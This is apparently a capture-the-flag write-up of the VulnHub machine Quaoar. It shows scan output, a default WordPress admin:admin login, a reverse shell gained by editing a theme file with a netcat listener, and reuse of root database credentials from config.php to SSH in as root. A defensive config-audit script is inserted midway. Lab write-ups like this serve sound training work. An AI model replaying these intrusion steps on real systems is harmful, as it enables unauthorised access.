6 July 2022

Pentesting Fun Stuff

following the cyber security path…

hackfest2016: Quaoar

Location

https://download.vulnhub.com/hackfest2016/Quaoar.ova

Description

This is a vulnerable machine created for the Hackfest 2016 CTF (http://hackfest.ca/).
It is a beginner-level machine for those who wish to learn more about pentesting/hacking.

Getting started

I start with an nmap scan to see what ports are open and what is running behind those ports.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -p- 192.168.171.2
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-17 16:41 CET
Nmap scan report for 192.168.171.2
Host is up (0.024s latency).
Not shown: 65526 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain      ISC BIND 9.8.1-P1
| dns-nsid:
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: STLS CAPA TOP UIDL PIPELINING RESP-CODES SASL
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-03-17T16:43:23+00:00; +59m58s from scanner time.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS listed OK have ENABLE Pre-login capabilities IDLE LOGINDISABLEDA0001 LITERAL+ SASL-IR ID post-login STARTTLS more IMAP4rev1
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-03-17T16:43:24+00:00; +59m58s from scanner time.
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-03-17T16:43:24+00:00; +59m58s from scanner time.
995/tcp open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: CAPA USER TOP UIDL PIPELINING RESP-CODES SASL(PLAIN)
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-03-17T16:43:24+00:00; +59m58s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.6.3)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-03-17T12:43:23-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.23 seconds

Looks like a lot of open ports and services.

Webserver

I start off with Dirb to enumerate the pages.

---- Scanning URL: http://192.168.171.2/ ----
+ http://192.168.171.2/hacking (CODE:200|SIZE:616848)
+ http://192.168.171.2/index (CODE:200|SIZE:100)
+ http://192.168.171.2/index.html (CODE:200|SIZE:100)
+ http://192.168.171.2/robots (CODE:200|SIZE:271)
+ http://192.168.171.2/robots.txt (CODE:200|SIZE:271)
==> DIRECTORY: http://192.168.171.2/upload/
==> DIRECTORY: http://192.168.171.2/wordpress/

Dirb did its work nicely and spat out a very long list, which I cut down to a small piece.
Most interesting is the WordPress site. To enumerate this site I use wpscan.

        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|
        WordPress Security Scanner by the WPScan Team
                       Version 2.9.2
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.171.2/wordpress/
[+] Started: Fri Mar 17 17:30:27 2017
[!] The WordPress 'http://192.168.171.2/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://192.168.171.2/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.171.2/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.171.2/wordpress/wp-includes/
[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[.....SNIP.....]
[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8730
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 3.9.16
[.....SNIP.....]
[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+--------+--------+
    | Id | Login  | Name   |
    +----+--------+--------+
    | 1  | admin  | admin  |
    | 2  | wpuser | wpuser |
    +----+--------+--------+
[!] Default first WordPress username 'admin' is still used
[+] Finished: Fri Mar 17 17:31:29 2017
[+] Requests Done: 4344
[+] Memory used: 49.875 MB
[+] Elapsed time: 00:01:01

It looks like the default username is still active. Normally I would try to brute-force the password of the found username, but because the default settings are in place I try admin:admin first.

And I’m in.
To get a reverse shell I edit the ‘search.php’ file and replace the PHP code with the one from pentestmonkey. After setting up a listener I trigger the code by pressing the search button.

┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
Listening on [0.0.0.0] (family 0, port 31337)
Connection from 192.168.171.2 49617 received!
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
 14:57:19 up  2:19,  0 users,  load average: 0.18, 0.12, 0.08
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Recon

$ cd /home
$ ls -lah
total 12K
drwxr-xr-x  3 root root 4.0K Oct 24 03:19 .
drwxr-xr-x 22 root root 4.0K Oct  7 00:32 ..
drwxr-xr-x  2 root root 4.0K Oct 22 12:53 wpadmin
$ cd wpadmin
$ ls lah
ls: cannot access lah: No such file or directory
$ ls -lah
total 12K
drwxr-xr-x 2 root    root    4.0K Oct 22 12:53 .
drwxr-xr-x 3 root    root    4.0K Oct 24 03:19 ..
-rw-r--r-- 1 wpadmin wpadmin   33 Oct 22 12:53 flag.txt
$ cat flag.txt
2bafe61f03117ac66a73c3c514de796e

First flag. Looks like an MD5 hash.

$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"
www-data@Quaoar:/home/wpadmin$ netstat -ant
netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN

After connecting to the MySQL server it appeared the database had no useful information in it.
When browsing /var/www/ I stumbled upon config.php.

// config file created by LEPTON 2.2.0
define('DB_TYPE', 'mysql');
define('DB_HOST', 'localhost');
define('DB_PORT', '3306');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_NAME', 'Lepton');
define('TABLE_PREFIX', 'lep_');

It had root credentials inside.
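As an added example, not code from the original post or from the LEPTON or WordPress projects, here is a small Python audit for define()-style PHP configs like the config.php above. It flags the weaknesses this walkthrough chained together: a root database account with a guessable password in a readable config, and the WordPress theme editor left enabled (the search.php edit earlier). The sample configs and finding strings are constructed; DISALLOW_FILE_EDIT is WordPress's real constant for disabling that editor and means nothing to LEPTON, so that check only applies when the file audited is a wp-config.php.

```python
import os
import re
import stat
import tempfile
# Constructed sample in the define('KEY', 'value'); form of the config.php found in /var/www.
SAMPLE_CONFIG = """<?php
// config file created by LEPTON 2.2.0
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'rootpassword!');
"""
# Constructed hardened counterpart (DISALLOW_FILE_EDIT is WordPress's theme-editor switch).
HARDENED_CONFIG = """<?php
define('DB_USERNAME', 'lepton_app');
define('DB_PASSWORD', 'PLACEHOLDER-use-a-generated-secret');
define('DISALLOW_FILE_EDIT', true);
"""
DEFINE_RE = re.compile(r"define\(\s*'([A-Za-z_]+)'\s*,\s*(?:'([^']*)'|(true|false))\s*\)")

def parse_defines(text):
    """Map every define('KEY', 'str'|true|false) in a PHP config to its value."""
    out = {}
    for key, sval, bval in DEFINE_RE.findall(text):
        out[key] = (bval == "true") if bval else sval
    return out

def audit_config(defines, mode=None):
    """Return one finding per weakness this box hinged on; mode is the file's st_mode."""
    user, pwd = defines.get("DB_USERNAME", ""), defines.get("DB_PASSWORD", "")
    findings = []
    if user == "root":
        findings.append("DB_USERNAME is root: the web app holds full DBA rights")
    if user and pwd and user.lower() in pwd.lower():
        findings.append("DB_PASSWORD contains the account name: trivially guessable")
    if defines.get("DISALLOW_FILE_EDIT") is not True:
        findings.append("DISALLOW_FILE_EDIT not true: admin panel can edit theme PHP (code exec)")
    if mode is not None and mode & stat.S_IROTH:
        findings.append("config is world-readable: any local user can read DB_PASSWORD")
    return findings

def audit_text_as_file(text, mode):
    """Write text to a temp file with the given mode, then audit content and permissions."""
    with tempfile.NamedTemporaryFile("w", suffix=".php", delete=False) as fh:
        fh.write(text)
        path = fh.name
    try:
        os.chmod(path, mode)
        with open(path) as fh:
            return audit_config(parse_defines(fh.read()), os.stat(path).st_mode)
    finally:
        os.unlink(path)
```

Calling audit_text_as_file(SAMPLE_CONFIG, 0o644) returns four findings for the page's config, while the hardened version with mode 0o640 returns none.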

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $ssh root@192.168.171.2
root@192.168.171.2's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)
 * Documentation:  https://help.ubuntu.com/
  System information as of Fri Mar 17 15:44:22 EDT 2017
  System load:  0.17              Processes:             103
  Usage of /:   30.0% of 7.21GB   Users logged in:       0
  Memory usage: 46%               IP address for eth0:   192.168.171.2
  Swap usage:   0%                IP address for virbr0: 192.168.122.1
  Graph this data and manage this system at https://landscape.canonical.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com
root@Quaoar:~#

Now for the next flag.

root@Quaoar:~# cd /root
root@Quaoar:~# ls -lah
total 48K
drwx------  6 root root 4.0K Nov 30 19:52 .
drwxr-xr-x 22 root root 4.0K Oct  7 00:32 ..
drwx------  2 root root 4.0K Oct  7 00:30 .aptitude
-rw-------  1 root root  368 Jan 15 11:25 .bash_history
-rw-r--r--  1 root root 3.1K Apr 19  2012 .bashrc
drwx------  2 root root 4.0K Oct 15 19:23 .cache
----------  1 root root   33 Oct 22 12:44 flag.txt
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
drwx------  2 root root 4.0K Oct 26 20:50 .ssh
-rw-------  1 root root 4.7K Nov 30 19:40 .viminfo
drwxr-xr-x  8 root root 4.0K Jan 29  2015 vmware-tools-distrib
root@Quaoar:~# cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb

The description said something about a post-exploitation flag. Unfortunately I didn’t find any.
Oh well. Got root… so game over. This was the easiest of the three. Time for number 2.
